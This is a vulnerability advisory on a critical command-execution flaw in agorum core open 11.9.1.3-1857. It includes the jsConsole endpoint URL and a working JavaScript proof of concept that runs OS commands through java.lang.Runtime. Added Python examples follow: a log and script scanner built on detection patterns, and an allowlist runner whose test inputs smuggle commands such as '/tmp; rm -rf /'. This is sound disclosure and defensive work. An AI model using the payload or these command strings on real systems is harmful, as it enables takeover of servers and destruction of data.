usd-2025-0021 | Agorum core open 11.9.1.3-1857 - Remote Code Execution

Product: Agorum core open
Affected Version: 11.9.1.3-1857
Vulnerability Type: Improper Neutralization of Special Elements used in a Command (Command Injection) (CWE-77)
Security Risk: Critical
Vendor: Agorum
Vendor URL: https://www.agorum.com/
Vendor acknowledged vulnerability: No
Vendor Status: Not fixed
CVE Number: Not requested
CVE Link: Not requested
Advisory ID: usd-2025-0021

Description

agorum core is an open-source Enterprise Content Management (ECM) system developed by agorum Software GmbH in Germany. It offers a modular, highly customizable platform for document management, workflow automation, and digital collaboration.

Proof of Concept

An administrative user can make use of a module called jsConsole, which executes arbitrary server-side JavaScript. Because the script engine exposes the Java runtime (java.lang.Runtime, java.io and so on), this amounts to executing arbitrary commands at the operating system level.

The jsConsole is reached through the following endpoint (the config parameter, URL-decoded, is {isAdmin:true,isConsoleOnly:true}):
/roiwebui/home_module/container/?parent=root&id=root.0&module=Home&brick=ScriptEditor&config={isAdmin%3Atrue%2CisConsoleOnly%3Atrue}

The following payload, entered into the console, executes the whoami command through the Java runtime and returns its output:

var runCommand = function(cmd) {
    // Java interop from the script engine: obtain the JVM Runtime and spawn a process
    var runtime = java.lang.Runtime.getRuntime();
    var process = runtime.exec(cmd);
    // Read the spawned process's stdout line by line
    var reader = new java.io.BufferedReader(
        new java.io.InputStreamReader(process.getInputStream())
    );
    var line;
    var output = "";
    while ((line = reader.readLine()) != null) {
        output += line + "\n";
    }
    reader.close();
    process.waitFor();
    return output;
};
runCommand("whoami");

The following screenshot shows the output of that command: the service runs as the root user, so an attacker who reaches the console gains full control over the system.
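For detection, the two observable artifacts on the page are the jsConsole endpoint (brick=ScriptEditor with isConsoleOnly:true in the config parameter) and the Java-interop calls in the payload. The following Python script is an added example, not part of the advisory and not agorum code: it parses constructed combined-format access log lines (hypothetical hosts, users and timestamps) and flags requests that open the console, and separately scans script bodies for the java.lang.Runtime / getRuntime / exec / ProcessBuilder indicators. The log format and the indicator list are assumptions for illustration; an agorum deployment's own access or audit log may differ.

```python
"""Added example: flag jsConsole access in web logs and Java-interop indicators in scripts.
Not from the advisory or from agorum; log format and indicator names are assumptions."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access log lines (combined format, hypothetical hosts/users/timestamps).
# Line 1 opens the console via the endpoint named in the advisory; line 3 is an ordinary
# Home-module request that must not be flagged.
SAMPLE_LOG = """\
10.0.0.5 - admin [27/Jun/2025:10:01:12 +0200] "GET /roiwebui/home_module/container/?parent=root&id=root.0&module=Home&brick=ScriptEditor&config={isAdmin%3Atrue%2CisConsoleOnly%3Atrue} HTTP/1.1" 200 5120
10.0.0.5 - admin [27/Jun/2025:10:01:40 +0200] "POST /roiwebui/home_module/container/ HTTP/1.1" 200 88
10.0.0.9 - alice [27/Jun/2025:10:02:03 +0200] "GET /roiwebui/home_module/container/?parent=root&id=root.0&module=Home HTTP/1.1" 200 2048
"""

# The advisory's payload (abbreviated) and a constructed benign script, for the script scanner.
POC_SCRIPT = """\
var runCommand = function(cmd) {
    var runtime = java.lang.Runtime.getRuntime();
    var process = runtime.exec(cmd);
    return process;
};
runCommand("whoami");
"""
BENIGN_SCRIPT = "var total = 0;\nfor (var i = 0; i < 3; i++) { total += i; }\n"

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
JSCONSOLE_PATH = "/roiwebui/home_module/container/"

# Indicators of OS-level execution via Java interop inside a script body.
SCRIPT_INDICATORS = {
    "java.lang.Runtime": re.compile(r"java\.lang\.Runtime\b"),
    "getRuntime": re.compile(r"\bgetRuntime\s*\("),
    "exec": re.compile(r"\.exec\s*\("),
    "ProcessBuilder": re.compile(r"\bProcessBuilder\b"),
}


def parse_line(line):
    """Split one combined-format log line into fields; None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qs percent-decodes, so config becomes "{isAdmin:true,isConsoleOnly:true}"
    rec["query"] = {k: v[-1] for k, v in parse_qs(parts.query).items()}
    return rec


def classify_request(rec):
    """Return a reason string when the request reaches the ScriptEditor brick, else None."""
    if not rec["path"].startswith(JSCONSOLE_PATH):
        return None
    if rec["query"].get("brick") != "ScriptEditor":
        return None
    cfg = rec["query"].get("config", "").replace(" ", "")
    if "isConsoleOnly:true" in cfg:
        return "jsConsole opened (brick=ScriptEditor, isConsoleOnly:true)"
    return "ScriptEditor brick requested"


def scan_log(text):
    """Return one finding per log line that reaches the jsConsole."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        reason = classify_request(rec)
        if reason:
            findings.append({"ip": rec["ip"], "user": rec["user"],
                             "ts": rec["ts"], "reason": reason})
    return findings


def suspicious_script_patterns(script):
    """Names of Java-interop indicators present in a submitted script body."""
    return [name for name, rx in SCRIPT_INDICATORS.items() if rx.search(script)]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} user={f['user']}: {f['reason']}")
    print("PoC script indicators:", suspicious_script_patterns(POC_SCRIPT))
    print("benign script indicators:", suspicious_script_patterns(BENIGN_SCRIPT))
```

The two checks are deliberately separate: console access by an administrator may be legitimate and is worth an alert of its own, whereas a script body reaching java.lang.Runtime is the high-confidence signal and should be escalated regardless of who submitted it.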

Fix

First, all input passed to jsConsole must be strictly validated. Only a predefined set of safe commands should be accepted, and input containing shell metacharacters or other potentially dangerous characters must be rejected or properly escaped. Note that the proof of concept involves no shell at all: the script calls java.lang.Runtime directly, so character filtering alone is not sufficient and the script engine should also restrict which Java classes scripts may reference.

Additionally, an allowlist approach should be implemented, permitting only specific, necessary commands with fixed arguments to be executed. Arbitrary command execution should not be possible at all.

It is also crucial to configure the service to run with the least privileges possible. Instead of operating as the root user, the service should run under a dedicated low-privileged account, which significantly reduces the potential impact of any successful exploitation.

If jsConsole is not absolutely required, the functionality should be disabled; otherwise access should be restricted to the smallest possible set of administrators and source networks.
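The allowlist and least-privilege points above, shown as an added Python example that is not agorum's code and does not reflect how jsConsole is implemented: callers may only name a command from a server-side table, argv is fixed and passed without a shell, arguments that look like options or contain metacharacters are rejected rather than escaped, and a startup check refuses to run as root. The command names in ALLOWED_COMMANDS and the SAFE_ARG pattern are illustrative assumptions.

```python
"""Added example (not agorum's code): allowlisted command execution plus a root check.
ALLOWED_COMMANDS and SAFE_ARG are illustrative assumptions, not values from the product."""
import os
import re
import subprocess

# Command *names* map to fixed argv lists. The caller never supplies a program path.
ALLOWED_COMMANDS = {
    "whoami": ["whoami"],
    "uptime": ["uptime"],
    "disk-usage": ["df", "-h"],  # may take one optional argument: a path
}

# Conservative argument shape: letters, digits, dot, slash, underscore, dash only.
SAFE_ARG = re.compile(r"^[A-Za-z0-9._/-]{1,128}$")


class CommandRejected(ValueError):
    pass


def validate_request(name, args=()):
    """Map (name, args) to a concrete argv, or raise CommandRejected."""
    argv = ALLOWED_COMMANDS.get(name)
    if argv is None:
        # "whoami; id" is simply not a key; no parsing of user input happens at all
        raise CommandRejected(f"command not in allowlist: {name!r}")
    for arg in args:
        if not SAFE_ARG.match(arg):
            raise CommandRejected(f"argument contains disallowed characters: {arg!r}")
        if arg.startswith("-"):
            # "-x" would be parsed as an option by the target program (argument injection)
            raise CommandRejected(f"argument must not look like an option: {arg!r}")
    return argv + list(args)


def is_allowed(name, args=()):
    """Boolean form of validate_request for callers that only need a decision."""
    try:
        validate_request(name, args)
        return True
    except CommandRejected:
        return False


def run_allowlisted(name, args=()):
    """Execute an allowlisted request; returns (return code, stdout)."""
    argv = validate_request(name, args)
    # argv list with shell=False: the OS receives exactly these strings, no shell parsing
    proc = subprocess.run(argv, capture_output=True, text=True, timeout=10, check=False)
    return proc.returncode, proc.stdout.strip()


def running_as_root():
    """Least-privilege check: True when the effective user is root (POSIX only)."""
    geteuid = getattr(os, "geteuid", None)
    return geteuid is not None and geteuid() == 0


if __name__ == "__main__":
    if running_as_root():
        print("warning: running as root; use a dedicated low-privileged service account")
    requests = [
        ("whoami", ()),
        ("disk-usage", ("/",)),
        ("whoami; id", ()),
        ("disk-usage", ("--output=source",)),
        ("disk-usage", ("/tmp; rm -rf /",)),
    ]
    for name, args in requests:
        print(name, args, "->", "allowed" if is_allowed(name, args) else "rejected")
    print(run_allowlisted("whoami"))
```

The important property is that user input is only ever used as a dictionary key or as a validated positional argument; nothing the user types is concatenated into a command string or handed to a shell, so there is nothing to escape.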

Timeline

  • 2025-05-05: First contact request via mail.
  • 2025-05-05: The vendor received our finding and began triage.
  • 2025-05-07: The vendor has begun addressing and fixing the issue.
  • 2025-05-27: The vendor has not confirmed this vulnerability, as it pertains to a system-relevant function.
  • 2025-06-27: This advisory is published.

Credits

This security vulnerability was identified by Jakob Steeg, Roman Hergenreder, Florian Kimmes, Kai Glauber, DR and Ole Wagner of usd AG.